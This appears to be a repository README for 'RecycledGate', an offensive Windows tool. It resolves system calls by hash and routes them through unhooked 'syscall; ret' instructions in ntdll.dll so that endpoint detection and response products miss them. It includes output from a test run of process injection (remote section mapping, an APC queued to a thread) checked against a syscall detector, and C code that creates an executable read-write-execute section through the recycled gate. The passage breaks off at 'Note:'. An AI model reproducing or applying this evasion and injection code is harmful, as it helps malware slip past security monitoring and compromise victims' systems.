thefLink / RecycledGate
- Saturday, 5 February 2022 at 00:34:05
Hellsgate + Halosgate/Tartarusgate. Ensures that all system calls go through ntdll.dll

This is just another implementation of Hellsgate + Halosgate/Tartarusgate.

However, this implementation makes sure that all system calls still go through ntdll.dll, avoiding the use of direct system calls.

To do so, I parse ntdll for non-hooked syscall stubs and re-use their existing `syscall; ret` instructions, hence the name of this project.

This probably bypasses some EDRs that try to detect abnormal system calls.

I have verified the sample program in this repository against syscall-detect by @winternl_t, which uses the HookingNirvana technique to detect abnormal system calls.
```text
.\Sample.exe HelloWorld.bin
[SYSCALL-DETECT] Console logging started...
[SYSCALL-DETECT] ntdll BaseAddress: 0x368508928
[SYSCALL-DETECT] win32u BaseAddress: 0x0
[*] Resolving Syscall: 916c6394
Found syscall using Halos gate
Found syscall; ret instruction
Syscall nr: 74
Gate: 00007FF9160100E2
[SNIP]
[*] Resolving Syscall: 8a4e6274
Found syscall using Halos gate
Found syscall; ret instruction
Syscall nr: 188
Gate: 00007FF916010F12
[*] Created section: 0x00000000000000B4
[*] Mapped section locally: 0x000001B244E50000
[*] Mapped section remote: 0x0000000000FE0000
[*] NtQueueApcThread successfull
[*] Resumed thread
```
The sample program can be found in the `sample` folder.

Here is a snippet, which should be self-explanatory:
```c
// Resolve NtCreateSection by the hash of its name and locate a reusable
// syscall; ret gate inside ntdll.dll.
Syscall sysNtCreateSection = { 0x00 };
NTSTATUS ntStatus;

dwSuccess = getSyscall(0x916c6394, &sysNtCreateSection);
if (dwSuccess == FAIL)
    goto exit;

// Hand the syscall number and the recycled gate address to the stub.
PrepareSyscall(sysNtCreateSection.dwSyscallNr, sysNtCreateSection.pRecycledGate);

// Invoke NtCreateSection through the recycled gate in ntdll.dll.
ntStatus = DoSyscall(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE,
                     NULL, (PLARGE_INTEGER)&sizeBuffer, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(ntStatus)) {
    printf("[-] Failed to create section\n");
    goto exit;
}
```
Note: